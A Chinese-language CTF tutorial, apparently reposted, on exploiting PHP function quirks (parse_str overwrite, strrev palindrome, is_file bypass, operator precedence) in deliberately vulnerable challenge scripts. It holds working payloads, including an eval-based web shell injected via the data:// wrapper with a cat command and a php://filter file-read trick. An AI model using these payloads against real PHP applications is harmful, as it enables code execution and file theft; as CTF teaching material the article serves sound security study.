CTF中的PHP特性函数解析之下篇

李巨城

前言

上篇文章讲的进阶一些的PHP特性不知道大家吸收的怎么样了，今天作为本PHP特性函数的最后一篇，我也会重点介绍一些有趣的PHP特性以及利用方法，下面开始我们今天的内容分享。

parse_str

parse_str()这个函数会把查询字符串解析到变量中。那么我们如何利用它的特性呢，我们看下面的例子：

1. <?php
   
2. highlight_file(__FILE__);
   
3. error_reporting(0);
   
4. include("flag.php");
   
5. if(isset($_POST['v1'])){
   
6.     $v1 = $_POST['v1'];
   
7.     $v3 = $_GET['v3'];
   
8.        parse_str($v1,$v2);
   
9.        if($v2['flag']==md5($v3)){
   
10.            echo $flag;
    
11.        }
    
12. } ?>

复制代码

分析一下代码要求我们什么，看最后要我们数组v2等于md5(v3)，而根据上面代码v2则是由该函数经过v1后赋值给的，那我们解题的思路就有了，利用parse_str() 函数的特点将v2[flag]的值覆盖，那么具体要怎样做呢？
先对数字5进行md5加密：

1. <?php
   
2. $b=md5('5');
   
3. echo $b;// e4da3b7fbbce2345d7772b0674a318d5
   
4. ?>

复制代码

之后再从v1传入我们的值即可完成绕过：

1. Payload：
   
2. GET：v3=5
   
3. POST: v1=flag=e4da3b7fbbce2345d7772b0674a318d5

复制代码

strrev

这个函数还是很好理解的，就是将字符串进行翻转，曾经遇到过考察这个的题目觉得很有趣分享给大家，我们先看代码：

1. highlight_file(__FILE__);
   
2.     $file = $_POST['file'];
   
3.     if(isset($file)){
   
4.         if(strrev($file)==$file){
   
5.             include $file;
   
6.         }

复制代码

代码很简单，第一个是高亮代码没有什么用，要我们传入file而且要使回文数等于它本身并且还要考虑如何进行攻击，是不是不太好想，这里使用php里面的data协议，该协议可以进行写入数据，而且?>闭合后可以加任意字符不会受别的影响。于是我们构造代码：

1. data://text/plain,<?php eval($_POST[1]);?>>?;)]1[TSOP_$(lave php?<,nialp/txet//:atad&1=echo `cat /f1agaaa`;

复制代码

可以看到思路还是挺巧妙的。

is_file

该函数检测是不是一个常规的文件类型，在CTF中也出过绕过这个函数的题目，下面我们先看看代码：

1. <?php
   
2. highlight_file(__FILE__);
   
3. error_reporting(0);
   
4. function filter($file){
   
5.     if(preg_match('/../|http|https|data|input|rot13|base64|string/i',$file)){
   
6.         die("hacker!");
   
7.     }else{
   
8.         return $file;
   
9.     }
   
10. }
    
11. $file=$_GET['file'];
    
12. if(! is_file($file)){
    
13.     highlight_file(filter($file));
    
14. }else{
    
15.     echo "hacker!";
    
16. } ?>

复制代码

分析一下filter函数过滤了很多关键字符串对我们的输入进行限制，最后还不能让is_file检测出来是文件，那我们要怎样读取flag.php文件呢，看最后有个高亮file的操作，这里就是利用点，我们要让其等于flag文件，于是需要绕过：
这里 根据特性is_file不会识别php伪协议，于是我们构造下面代码：

1. php://filter/read=convert.quoted-printable-encode/resource=flag.php

复制代码

这样传入即可绕过检测。

优先级问题

在php里存在以下优先级特性：
&&与||的优先级高于=，而&&优先级高于||
=的优先级高于and与or
这里也可以作为考点来考，我们看下面代码：

1. <?php
   
2. include("flag.php");
   
3. highlight_file(__FILE__);
   
4. if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
   
5.     $username = (String)$_GET['username'];
   
6.     $password = (String)$_GET['password'];
   
7.     $code = (String)$_GET['code'];
   
8.     if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
   
9.         if($code == 'admin'){
   
10.             echo $flag;
    
11.         }
    
12.     }
    
13. }

复制代码

我们需要传入三个参数，之后进行类型的强制转换，再通过判断语句，最后需要code参数等于admin方可解题，根据优先级原则，所以当第一个判断条件为true时，直接跳过第二个条件然后判断第三个条件，可能有一些绕，只要username=admin为真值,code=admin输出flag，于是构造payload:

1. ?code=admin&password=1&username=admin

复制代码

结语

本文到这就结束了，这篇文章讲了几个比较有趣而且有一些难度的特性知识，不知道大家吸收的咋样了，当然PHP特性远没有这么少，更多关于CTF PHP特性函数的资料请关注脚本之家其它相关文章！

来源:https://www.jb51.net/article/275932.htm
免责声明：由于采集信息均来自互联网，如果侵犯了您的权益，请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容，谢谢合作！